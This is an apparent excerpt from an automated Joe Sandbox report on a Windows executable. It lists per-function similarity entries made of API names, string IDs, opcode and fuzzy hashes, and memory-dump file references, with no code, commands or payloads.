      • Instruction ID: 8311b9899f299a9072368cb6fbaaafb7bb4a8c96dd43b220e7f3935d2bf3a65d
      • Opcode Fuzzy Hash: 99fd53b48de60ad2b3b37300d72bcddb8f2580f530d7a1e219e10e2618182fab
      • Instruction Fuzzy Hash: E4017C28B08642B6FA04BB60954617CA365FF80B74FD44774D63E426D5DF3CE858B311
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Path$ObjectStroke$DeleteFillSelect
      • String ID:
      • API String ID: 2625713937-0
      • Opcode ID: c45599d3bc9fc7debef7ab567c3c0eb4022d53e70f819905b21d88790cde579c
      • Instruction ID: 01e7e345b59843b19a8af58a2d52793ebbb613c199d68becac62da3fcee67afb
      • Opcode Fuzzy Hash: c45599d3bc9fc7debef7ab567c3c0eb4022d53e70f819905b21d88790cde579c
      • Instruction Fuzzy Hash: 1A017139D0C642B5F7597B10B986334F761BF89B91FD841B0D46E462A0CF7DA054B324
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Thread$CurrentProcessWindow$AttachInputMessageSendTimeout
      • String ID:
      • API String ID: 179993514-0
      • Opcode ID: 3c9aaefa71688af513bcff76e9269722b622f20c654f000aa95846671475ad7f
      • Instruction ID: 52844c174c575c4126dff1033088d96197e3beb1952555456597e797ba1fcb46
      • Opcode Fuzzy Hash: 3c9aaefa71688af513bcff76e9269722b622f20c654f000aa95846671475ad7f
      • Instruction Fuzzy Hash: A2F0651CF1C61296FB1437B6B84B67493557FCC741FC450B0DC0A82651DD3D94D57A20
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: CreateInitializeInstanceUninitialize
      • String ID: .lnk
      • API String ID: 948891078-24824748
      • Opcode ID: d69a80715072412c422414223727881ed3508661fce737c81a5282fdefc00c23
      • Instruction ID: ee0db3d46a6fab8e50b2e2b028e78a694bb62722096c79adecbedb685305fab4
      • Opcode Fuzzy Hash: d69a80715072412c422414223727881ed3508661fce737c81a5282fdefc00c23
      • Instruction Fuzzy Hash: 6DD1BF66B18A46A1FF10EB16E4826BDBB70FBD0B84F804071EA4E47B65EE3CD504D750
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo
      • String ID: UTF-16LEUNICODE$UTF-8$ccs
      • API String ID: 3215553584-1196891531
      • Opcode ID: c3c6110ef47f8474b3aee38d103288009a94a732d54534d718fbbb8757739500
      • Instruction ID: eca588c6257fc38953ace3e8da3ae00bb59fb6970e8b6ac595cc3af90e66ff8c
      • Opcode Fuzzy Hash: c3c6110ef47f8474b3aee38d103288009a94a732d54534d718fbbb8757739500
      • Instruction Fuzzy Hash: D381E27AE0C202A6FB757F179E4227DA2A0AF91744FD480B1DA0E53680DB6DE850F321
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo
      • String ID: $*
      • API String ID: 3215553584-3982473090
      • Opcode ID: e1993591883a1ee4d578272befcf29134d05160a5f94b748d186053ef0cddf2b
      • Instruction ID: 355b7da24a587f75c4f088e565f03fa03e8d92e7ece0d47b1160e6177cc8e342
      • Opcode Fuzzy Hash: e1993591883a1ee4d578272befcf29134d05160a5f94b748d186053ef0cddf2b
      • Instruction Fuzzy Hash: 0561A43A94E2C39EF764AE24A04637EB7B4EB45B08F9413B5CB4A41189CF28E441E625
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: _set_statfp
      • String ID: !$acos
      • API String ID: 1156100317-2870037509
      • Opcode ID: 0d89aa78777a41b63d954a76095aee346a1dbdd639e7adc8a9fc006d5894d638
      • Instruction ID: b9f8fa3c631be4ed3250baacbadca7624955ab42d290c5a0d539e37ae543265c
      • Opcode Fuzzy Hash: 0d89aa78777a41b63d954a76095aee346a1dbdd639e7adc8a9fc006d5894d638
      • Instruction Fuzzy Hash: 7461F625D28F4598F223EB346812276D798BFE63D0F908376E91E75E64DF2CE042B610
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: _set_statfp
      • String ID: !$asin
      • API String ID: 1156100317-2188059690
      • Opcode ID: dda4458e7c1e859fb838f80da50bdd89987d805c8091ebd73b4f99c53429eb29
      • Instruction ID: d8c43d251e961ab0f801ac4b3cbbfae534cf6a98c0654a0dfbb5c388fed8bda6
      • Opcode Fuzzy Hash: dda4458e7c1e859fb838f80da50bdd89987d805c8091ebd73b4f99c53429eb29
      • Instruction Fuzzy Hash: 0661E726C28F8195F213EB346812376D798BFD63D0F908372E95E75A65DF2CE042B610
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
      • String ID: @
      • API String ID: 4150878124-2766056989
      • Opcode ID: 8590b3572ee50005f206f958431262ef9082a01c97b701578a5c0a82d3af5d25
      • Instruction ID: 5c2b6d1c9f5fdf507e67b15c2a588f1084feea8fa052c6560e2e5c90772f30bb
      • Opcode Fuzzy Hash: 8590b3572ee50005f206f958431262ef9082a01c97b701578a5c0a82d3af5d25
      • Instruction Fuzzy Hash: 5B51D03A618681A2E720EF52E482AAEF761F7C8B84F844071FE4D53B89DE7CD505DB10
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: ByteCharErrorFileLastMultiWideWrite
      • String ID: U
      • API String ID: 2456169464-4171548499
      • Opcode ID: 94b35a9ebb8fe33294e0bdd0e775bf8e0988a6ef2a86fc1225fbcd9ba36526fe
      • Instruction ID: f68fa69ca016a092c095d2aacb3bcf80e19d11129f7a930afbdb0d4942d0f35f
      • Opcode Fuzzy Hash: 94b35a9ebb8fe33294e0bdd0e775bf8e0988a6ef2a86fc1225fbcd9ba36526fe
      • Instruction Fuzzy Hash: 1E41A226A1974196EB20EF15E4463AAB7A1FB88794F804031EE8E87788DF3CD441E751
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Window$Long
      • String ID: SysTreeView32
      • API String ID: 847901565-1698111956
      • Opcode ID: efcadc7bc094786019cbc8bf8bf3fbcf06e95b4321d3c984f5b6707381f7f713
      • Instruction ID: 5ac891cea13b462aadeabe668abf93db7b938fa24fa4025b1ec3794f0f368afa
      • Opcode Fuzzy Hash: efcadc7bc094786019cbc8bf8bf3fbcf06e95b4321d3c984f5b6707381f7f713
      • Instruction Fuzzy Hash: FA418E36A097829AE7709F28E445B9AB3A1F784760F504375EAA803B99CF3CD941DF50
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: MessageSend$Window$CreateObjectStock
      • String ID: SysMonthCal32
      • API String ID: 2671490118-1439706946
      • Opcode ID: fd789cdfff50be9b4411109bcad662b9f9b7c83045e67513290be4d4cd92b5f4
      • Instruction ID: 362a6ade908804f7a8a9bdd710a6e5ab5619b17278b32b04c4f852dce36a7b8d
      • Opcode Fuzzy Hash: fd789cdfff50be9b4411109bcad662b9f9b7c83045e67513290be4d4cd92b5f4
      • Instruction Fuzzy Hash: 66417D366086C29BE330DF15E444B9AF7A0F7C87A0F508229EA9943A99DF3DD5859F00
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: MessageSend$Window$CreateDestroyObjectStock
      • String ID: msctls_updown32
      • API String ID: 1752125012-2298589950
      • Opcode ID: 74e3ad92c2baccfb6081841c4f4ce29bd6f6c1edab28d3e774f2eecd82cc7261
      • Instruction ID: a4ab1eaf4bca8def9ed331d763bbba7e83b7d09360fea3daab64fc61f921e5e4
      • Opcode Fuzzy Hash: 74e3ad92c2baccfb6081841c4f4ce29bd6f6c1edab28d3e774f2eecd82cc7261
      • Instruction Fuzzy Hash: 1231B136A18B81A6FB60DF15E4413AAB361FBC8B91F908176EA8D43B59CF3CD445DB10
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: MessageSend$Window$CreateMoveObjectStock
      • String ID: Listbox
      • API String ID: 3747482310-2633736733
      • Opcode ID: 4629ce28c24575fa998f22937708fe0feac1f339ddb28addb223e5ca3634c4d7
      • Instruction ID: 2560e9a4decb5ed9f432d167b4d160195609b3afc7695b8170c5b665139a2421
      • Opcode Fuzzy Hash: 4629ce28c24575fa998f22937708fe0feac1f339ddb28addb223e5ca3634c4d7
      • Instruction Fuzzy Hash: 48315A366087C196E770DF16F444A5AB7A5F7887A0F908225EEA903B99DB3DD481DF00
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: ErrorMode$InformationVolume
      • String ID: %lu
      • API String ID: 2507767853-685833217
      • Opcode ID: 1d2d9ec70042b180fc7aee4065bf2b0cf31a7f0658b1f1c5aeac4af0ce1da44c
      • Instruction ID: 76ada5da873f91ad99c8d3474b42687bd73314510910cd6fc3cbd8673dbe47e7
      • Opcode Fuzzy Hash: 1d2d9ec70042b180fc7aee4065bf2b0cf31a7f0658b1f1c5aeac4af0ce1da44c
      • Instruction Fuzzy Hash: 1B31AE7A608B86A6EB10EB16E4811ADF7B1FB88BC0F804075EA8D43B65CF3CD591D710
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: MessageSend$CreateObjectStockWindow
      • String ID: msctls_trackbar32
      • API String ID: 1025951953-1010561917
      • Opcode ID: d23565779f05c86e88825c5223c790f228a79c76439431c452903b53a7f93148
      • Instruction ID: 8824e29b031093b11f0e44df59b9cb07f9c2d5356a5f903bb3ee83d68a154a28
      • Opcode Fuzzy Hash: d23565779f05c86e88825c5223c790f228a79c76439431c452903b53a7f93148
      • Instruction Fuzzy Hash: 5F316836A086819BE360DF15E445B6AB7A1FBC8B90F508279EB9843B58CF3CD941DF14
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Exception$DestructObject$Raise__vcrt_getptd_noexit
      • String ID: csm
      • API String ID: 2280078643-1018135373
      • Opcode ID: f3b44f69e9663573439d22a4e4da11b073c1d9211702bf15dcc91806c3a7fe41
      • Instruction ID: 2c7d8e2cf01119b54d4ba5cbb7cb7e519fdf040f01d2abf1e2444c4142c6cc86
      • Opcode Fuzzy Hash: f3b44f69e9663573439d22a4e4da11b073c1d9211702bf15dcc91806c3a7fe41
      • Instruction Fuzzy Hash: 86211A3A60969296E670AF12F44126EB7B1F785BA4F800365DF9D03795CF3CE886DB10
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: CloseControlCreateDeviceFileHandle
      • String ID: 0
      • API String ID: 33631002-4108050209
      • Opcode ID: 122fac756a3aebd614dbe24bd4d9d3fcd08661cb9d9b68eb4b308195107418d6
      • Instruction ID: 24a8baf59b91c9c870dd94afd6a3344d7483b904e4457b359be34a4bfdfe4fdd
      • Opcode Fuzzy Hash: 122fac756a3aebd614dbe24bd4d9d3fcd08661cb9d9b68eb4b308195107418d6
      • Instruction Fuzzy Hash: 4D21A336618B80DAE3208F25E48469AB7B8F3C4794F544226EB9D43B94CF3CCA55DB00
      APIs
      • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF73A232DD1), ref: 00007FF73A26AF37
      • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF73A232DD1), ref: 00007FF73A26AF4F
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: AddressLibraryLoadProc
      • String ID: GetSystemWow64DirectoryW$kernel32.dll
      • API String ID: 2574300362-1816364905
      • Opcode ID: b553b98cf413c0522d0a8d0790f0dad2998fa959ac13788e6be9999dd8a5b612
      • Instruction ID: 932850fba0f91c91dfb9396ffce8926678ea3075aea443ede9a5482ade61a340
      • Opcode Fuzzy Hash: b553b98cf413c0522d0a8d0790f0dad2998fa959ac13788e6be9999dd8a5b612
      • Instruction Fuzzy Hash: 96F01C69A06B06A1FF18AB50E455364A3F4FB98B09FC40475D91C42360EFBCD558F320
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: AddressLibraryLoadProc
      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
      • API String ID: 2574300362-1355242751
      • Opcode ID: f93d3ff0ce366ab95d7e6c8a1355595afc9dd02f208f5495b2fec8b10b31cda7
      • Instruction ID: c8d876d0333ffb7ad88cb2f5f96c139484ecc988b4aa1a7e2d32a603ee2941b0
      • Opcode Fuzzy Hash: f93d3ff0ce366ab95d7e6c8a1355595afc9dd02f208f5495b2fec8b10b31cda7
      • Instruction Fuzzy Hash: 2CE06D2A915F06A1FF15AB11F4063B863E4FB88B08F840470D91C45364EF7CE594E310
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: AddressLibraryLoadProc
      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
      • API String ID: 2574300362-3689287502
      • Opcode ID: 0d692eaeaee984e821757872aa743bf672a5f4ffbc2c7638c6bb6d49df66a179
      • Instruction ID: db29dcbc1cc5d29ea11f5ceb55857fe228a9cd902c3556f573b3ea0c49e4e18e
      • Opcode Fuzzy Hash: 0d692eaeaee984e821757872aa743bf672a5f4ffbc2c7638c6bb6d49df66a179
      • Instruction Fuzzy Hash: F5E06D2A925F06A1FF14AB11F40637863E4FB48B08F840471D91C41350EF7CE598E310
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
